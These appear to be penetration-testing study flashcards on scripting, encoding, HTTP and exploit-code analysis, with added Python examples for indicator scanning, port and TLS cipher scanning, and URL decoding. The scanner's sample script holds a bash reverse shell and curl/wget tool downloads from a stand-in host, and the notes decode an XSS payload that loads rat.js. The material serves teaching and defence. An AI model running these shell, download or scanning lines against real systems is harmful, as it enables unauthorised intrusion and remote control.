Chapter 12: Scripting for Penetration Testing Flashcards
Six Languages on Test
- Bash
- PowerShell
- Ruby
- Python
- Perl
- JavaScript
PowerShell Restrictions
- Restricted: Default execution policy on Windows client systems; no ps1 scripts run at all (interactive commands still work)
- AllSigned: Requires every ps1 script, local or downloaded, to be signed by a trusted publisher
- RemoteSigned: Allows execution of any ps1 script written on the local machine, but requires scripts downloaded from the internet to be signed by a trusted publisher (default on Windows Server)
- Unrestricted: Allows execution of any ps1 script but prompts you to confirm before you run one downloaded from the internet
- Bypass: Allows execution of any ps1 script with no warnings or prompts for anything
Percent Encoding
- %00: null
- %20: Space
- %21: !
- %22: "
- %23: #
- %24: $
- %25: %
- %26: &
- %27: '
- %28: (
- %29: )
- %2A: *
- %2B: +
- %2C: ,
- %2D: -
- %2E: .
- %2F: /
- %5C: \
- %3F: ?
- %3C: <
- %3E: >
Flow Controls
- Conditional Statements: Diagram on page 459
- For Loops: Diagram on page 464
- While Loops: Diagram on page 470
Analyzing Exploit Code
Enumeration
* Seeks to identify all the instances of a resource in an environment
* System enum identifies all the systems on a network
* User/Account enum identifies all the individuals with access to the environment
* Domain enum seeks to identify all valid subdomains for a parent domain
Downloading Files
* Commonly done to update malicious code, obtain instructions, or import new tools
* Pay attention to these downloads since the location and nature of files downloaded may provide clues to the identity and motivation of the attackers
Launching Remote Access
* One primary goal for attackers
* Once they run exploit code, they want to create remote access capabilities that allow them to control the system
* Provides important clues to the nature and purpose of an attack
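The three behaviours above (enumeration, downloading files, launching remote access) are what you look for when reading captured exploit code. Added example, not from the book or the course: a small indicator scanner that runs those checks over a constructed sample script and pulls out the download URLs and callback endpoints the notes say to keep as evidence. The sample script, the regexes and the category labels are all assumptions made for this illustration.

```python
import re

# Constructed sample script (not real malware, not from the page): one line per behaviour category.
SAMPLE_SCRIPT = r"""
#!/bin/bash
# stage 1: enumerate hosts and accounts
for ip in 10.0.0.{1..254}; do ping -c1 -W1 $ip >/dev/null && echo "$ip up"; done
net user /domain
# stage 2: fetch tooling and instructions
curl -s http://203.0.113.10/tools/linpeas.sh -o /tmp/.l.sh
wget -q http://203.0.113.10/c2/task.txt -O /tmp/.task
# stage 3: call home with an interactive shell
bash -i >& /dev/tcp/203.0.113.10/4444 0>&1
"""

# Indicator patterns for each category from the flashcards (illustrative, not exhaustive).
INDICATORS = {
    "enumeration": [
        ("host sweep", re.compile(r"\b(ping\s+-c|nmap\b|masscan\b|arp-scan\b)")),
        ("account enum", re.compile(r"\b(net\s+user|net\s+group|Get-ADUser|getent\s+passwd)\b", re.I)),
        ("domain enum", re.compile(r"\b(dnsrecon|sublist3r|amass|dig\s+axfr)\b", re.I)),
    ],
    "download": [
        ("http fetch", re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr|certutil\s+-urlcache)\b", re.I)),
    ],
    "remote_access": [
        ("bash /dev/tcp shell", re.compile(r"/dev/tcp/[\w.\-]+/\d+")),
        ("netcat shell", re.compile(r"\bnc(at)?\b[^\n]*\s-e\s")),
        ("python socket shell", re.compile(r"socket\.socket\(.*?subprocess", re.S)),
    ],
}

URL_RE = re.compile(r"https?://[\w.\-]+(?::\d+)?(?:/[^\s'\"]*)?")
DEVTCP_RE = re.compile(r"/dev/tcp/([\w.\-]+)/(\d+)")


def analyze_script(text):
    """Return {category: [(label, matched_text), ...]} plus the URLs and callback endpoints found.

    The URLs and callbacks are kept separately because, as the notes say, where the code
    downloads from and calls back to is the best clue to who is behind it.
    """
    findings = {cat: [] for cat in INDICATORS}
    for cat, rules in INDICATORS.items():
        for label, rx in rules:
            for m in rx.finditer(text):
                findings[cat].append((label, m.group(0).strip()))
    findings["urls"] = sorted(set(URL_RE.findall(text)))
    findings["callbacks"] = sorted({f"{host}:{port}" for host, port in DEVTCP_RE.findall(text)})
    return findings


if __name__ == "__main__":
    for category, hits in analyze_script(SAMPLE_SCRIPT).items():
        print(f"{category}: {hits}")
```

Run against anything you capture from a compromised host; the useful output is the `urls` and `callbacks` lists, which go straight into the incident timeline.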
Automating Pentests
Scanning Systems
* Testers may create code that automatically performs port scans of an environment, processes the results, and then automatically triggers next steps based on the results
* EX: If port scan indicates that a web server accepts HTTPS on port 443, a follow up scan might enum the SSL/TLS ciphers supported by the server and produce a report for review
Configuration Analysis of Target Systems
* Automated code can probe the configuration of a target system and produce a report that helps ID next steps
Modifying IP Addresses in Routine Activities
* Allows the rapid application of techniques to many different systems in an iterative fashion
* EX: Cycle through IPs in a for loop
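The three automation patterns above (scan, act on the result, loop over IPs) fit together in one script. Added example, not from the book or the course: iterate a CIDR block in a for loop, connect-scan a few ports per host, map each open port to the next automated step, and, for 443, enumerate the TLS ciphers the server will negotiate. The port list, follow-up table and the loopback target in the usage call are assumptions; the probe function is injectable so the decision logic can be tested without a network.

```python
import ipaddress
import socket
import ssl


def ip_range(cidr):
    """Host addresses in a CIDR block, as strings, for the 'for loop over IPs' in the notes."""
    net = ipaddress.ip_network(cidr, strict=False)
    return [str(ip) for ip in (list(net.hosts()) or [net.network_address])]


def tcp_connect(ip, port, timeout=0.5):
    """Default probe: full TCP connect. True when the port accepts the connection."""
    try:
        with socket.create_connection((ip, port), timeout=timeout):
            return True
    except OSError:
        return False


def scan_host(ip, ports, probe=tcp_connect):
    """Sorted list of open ports on one host; `probe(ip, port)` decides what 'open' means."""
    return sorted(p for p in ports if probe(ip, p))


# Assumed follow-up actions keyed by port (the notes only name the 443 case).
FOLLOW_UPS = {
    22: "grab SSH banner",
    80: "enumerate HTTP methods and directories",
    443: "enumerate TLS versions and ciphers",
    445: "enumerate SMB shares",
}


def next_steps(open_ports):
    """Turn scan results into the next automated actions; unknown ports get a generic step."""
    return [FOLLOW_UPS.get(p, f"banner-grab port {p}") for p in sorted(open_ports)]


def enumerate_tls_ciphers(host, port=443, timeout=3.0):
    """One handshake per cipher OpenSSL knows; return the names the server actually negotiated.

    set_ciphers() only restricts the TLS 1.2-and-below list (TLS 1.3 suite names raise
    SSLError and are skipped). Certificate checks are disabled on purpose: we want to see
    what the server offers, not whether its cert is valid.
    """
    accepted = set()
    for entry in ssl.create_default_context().get_ciphers():
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        try:
            ctx.set_ciphers(entry["name"])
        except ssl.SSLError:
            continue
        try:
            raw = socket.create_connection((host, port), timeout=timeout)
            with ctx.wrap_socket(raw, server_hostname=host) as tls:
                accepted.add(tls.cipher()[0])
        except (OSError, ssl.SSLError):
            pass
    return sorted(accepted)


def run(cidr, ports=(22, 80, 443, 445), probe=tcp_connect):
    """Scan every host in the block; return {ip: {'open': [...], 'next': [...]}} for live hosts."""
    report = {}
    for ip in ip_range(cidr):
        open_ports = scan_host(ip, ports, probe)
        if open_ports:
            report[ip] = {"open": open_ports, "next": next_steps(open_ports)}
    return report


if __name__ == "__main__":
    # Scans only loopback, so running this touches nothing but your own machine.
    for ip, info in run("127.0.0.1/32").items():
        print(ip, info)
        if 443 in info["open"]:
            print("  ciphers:", enumerate_tls_ciphers(ip))
```

`enumerate_tls_ciphers` is the slow part (one full handshake per suite); in a real pipeline you would feed its output into the report step rather than printing it.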
HTTP Method
A set of request methods to indicate the desired action to be performed for a given resource
A request contains a method, a resource (the request target), a version number, the headers, and the body of the request
GET
* The principal method used with HTTP and is used to retrieve a resource
POST
* Used to send data to the server for processing by the requested resource
PUT
* Creates or replaces the requested resource
DELETE
* Used to remove the requested resource
HEAD
* Retrieves the headers for a resource only; the server sends the same status line and headers it would for a GET but no body
* Often used by pentesters to banner grab information about the server and page from those headers, such as Server, Content-Type and Last-Modified
NOTE
* Data submitted via a URL (the query string) starts after the ? character; individual name=value pairs are separated by &
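The five request parts and the HEAD-versus-GET distinction above are easiest to see on the wire. Added example, not from the book or the course: build a raw HTTP/1.1 request for any method, parse one back into method, resource, version, headers and body (splitting the query string at the ?), and parse a constructed HEAD response to pull the banner fields out of it. The host name, the sample response text and the header values are assumptions made for this illustration.

```python
from urllib.parse import urlsplit, parse_qs


def build_request(method, url, headers=None, body=None):
    """Assemble a raw HTTP/1.1 request: request line, headers, blank line, optional body."""
    parts = urlsplit(url)
    target = parts.path or "/"
    if parts.query:
        target += "?" + parts.query  # data submitted via the URL follows the '?'
    hdrs = {"Host": parts.netloc, "Connection": "close"}
    hdrs.update(headers or {})
    if body is not None:
        hdrs["Content-Length"] = str(len(body.encode()))
    lines = [f"{method} {target} HTTP/1.1"] + [f"{k}: {v}" for k, v in hdrs.items()]
    return "\r\n".join(lines) + "\r\n\r\n" + (body or "")


def _parse_headers(lines):
    """'Name: value' lines -> dict with lower-cased names (header names are case-insensitive)."""
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def parse_request(raw):
    """Split a raw request into the five pieces the notes list."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    return {
        "method": method,
        "path": path,
        "query": parse_qs(query, keep_blank_values=True),  # name -> [values]
        "version": version,
        "headers": _parse_headers(header_lines),
        "body": body,
    }


def parse_response(raw):
    """Status line, headers and body of a raw response; a HEAD response simply has an empty body."""
    head, _, body = raw.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    version, code, reason = status_line.split(" ", 2)
    return {"version": version, "status": int(code), "reason": reason,
            "headers": _parse_headers(header_lines), "body": body}


def banner(raw_response):
    """The fields a HEAD-based banner grab is after (values assumed; present only if the server sends them)."""
    hdrs = parse_response(raw_response)["headers"]
    return {k: hdrs.get(k) for k in ("server", "x-powered-by", "content-type", "last-modified")}


# Constructed HEAD response for the example (not captured from any real server).
SAMPLE_HEAD_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.41 (Ubuntu)\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Last-Modified: Tue, 02 Jan 2024 10:00:00 GMT\r\n"
    "\r\n"
)

if __name__ == "__main__":
    print(build_request("HEAD", "http://example.test/upload.php?post=1"))
    print(parse_request(build_request("POST", "http://example.test/upload.php?post=1", body="a=1&b=2")))
    print(banner(SAMPLE_HEAD_RESPONSE))
```

To send one of these for real, write the string from `build_request` to a socket connected to port 80 (or wrap the socket with `ssl` for 443) and feed whatever comes back to `parse_response`.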
HTTP Response Codes
- 200 = OK, the request succeeded (typical for GET and POST)
- 201 = Created, the request (typically PUT or POST) created a new resource
- 3xx = Redirect from the server
- 4xx = Client request error
- 400 = Request could not be parsed by server
- 401 = Request did not supply auth creds
- 403 = Request did not have sufficient permissions
- 404 = Non-existent resource
- 5xx = Server side error
- 500 = General error on server side app
- 502 = Bad gateway when server is acting as a proxy
- 503 = Overload, service unavailability
- 504 = Gateway timeout
Example URL Analysis
hxxp://diontraining[.]com/upload.php?post=%3Cscript%3E%27http%3A%2F%2Fabc123.com%2Frat%2Ejs
hxxp://diontraining[.]com/upload.php?post=
* The website we're going to (diontraining[.]com)
* The file on that website (upload.php)
* The action we're going to do: POST (the parameter name)
* Everything after the ? is what we POST
%3Cscript%3E
* <script>
%27http%3A%2F%2Fabc123.com%2Frat%2Ejs
* 'http://abc123.com/rat.js (defanged: hxxp://abc123[.]com/rat.js)
Putting It Together
* Go to diontraining dot com
* Access the file upload.php
* POST that file (upload)
* Send it to this website address
* Link to rat.js
* Trying to send a JS file to the site
* If it was vulnerable, malicious code is uploaded
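The manual walk-through above is exactly what a script does in a few lines, and the same decoder serves the Percent Encoding table earlier on this page. Added example, not from the book or the course: a hand-rolled percent decoder and encoder (so the %XX mapping from the table is explicit), repeated decoding to catch double-encoded payloads such as %2527, and an analyzer that splits the defanged example URL into host, file and parameters, decodes each parameter, and flags the markers a pentester looks for. The indicator list and the defanging style are assumptions made for this illustration.

```python
import re
from urllib.parse import urlsplit


def percent_decode(s):
    """One pass of %XX decoding. Malformed sequences are left as-is, which preserves evidence."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "%" and re.fullmatch(r"[0-9A-Fa-f]{2}", s[i + 1:i + 3] or ""):
            out.append(chr(int(s[i + 1:i + 3], 16)))
            i += 3
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def percent_encode(s, safe="-._~"):
    """Encode every byte except ASCII letters, digits and the unreserved set; '%' itself becomes %25."""
    out = []
    for b in s.encode("utf-8"):
        c = chr(b)
        out.append(c if (c.isascii() and c.isalnum()) or c in safe else f"%{b:02X}")
    return "".join(out)


def decode_fully(s, max_rounds=5):
    """Decode until the string stops changing, keeping every layer.

    Double encoding (%2527 -> %27 -> ') is a common filter bypass, so the number of
    layers needed is itself a finding worth reporting.
    """
    layers = [s]
    for _ in range(max_rounds):
        nxt = percent_decode(layers[-1])
        if nxt == layers[-1]:
            break
        layers.append(nxt)
    return layers


def defang(url):
    """hxxp and [.] in the host only, matching the style used in the notes."""
    p = urlsplit(url)
    return f"{p.scheme.replace('http', 'hxxp')}://{p.netloc.replace('.', '[.]')}{p.path}" + (
        f"?{p.query}" if p.query else "")


# Assumed indicators checked against each decoded parameter value.
INDICATORS = [
    ("html script tag", re.compile(r"<\s*script\b", re.I)),
    ("embedded external URL", re.compile(r"https?://[\w.\-]+", re.I)),
    ("javascript file reference", re.compile(r"\.js\b", re.I)),
    ("null byte", re.compile("\x00")),
    ("quote character", re.compile(r"['\"]")),
]
EMBEDDED_URL_RE = re.compile(r"https?://[\w.\-]+(?:/[^\s'\"<>]*)?", re.I)


def analyze_url(url):
    """Host, file and per-parameter decoding/indicator report for a (possibly defanged) URL."""
    parts = urlsplit(url.replace("hxxp", "http").replace("[.]", "."))  # re-fang for parsing
    report = {"host": parts.netloc, "file": parts.path, "params": {}}
    pairs = parts.query.split("&") if parts.query else []
    for pair in pairs:
        name, _, raw = pair.partition("=")
        layers = decode_fully(raw)
        decoded = layers[-1]
        report["params"][percent_decode(name)] = {
            "raw": raw,
            "decoded": decoded,
            "encoding_layers": len(layers) - 1,
            "indicators": [label for label, rx in INDICATORS if rx.search(decoded)],
            "urls": [defang(u) for u in EMBEDDED_URL_RE.findall(decoded)],
        }
    return report


if __name__ == "__main__":
    sample = "hxxp://diontraining[.]com/upload.php?post=%3Cscript%3E%27http%3A%2F%2Fabc123.com%2Frat%2Ejs"
    print(analyze_url(sample))
```

Running it on the example URL from the page reports the parameter `post` decoding to `<script>'http://abc123.com/rat.js` with the script tag, the quote and the external `.js` reference all flagged, which is the same conclusion the walk-through above reaches by hand.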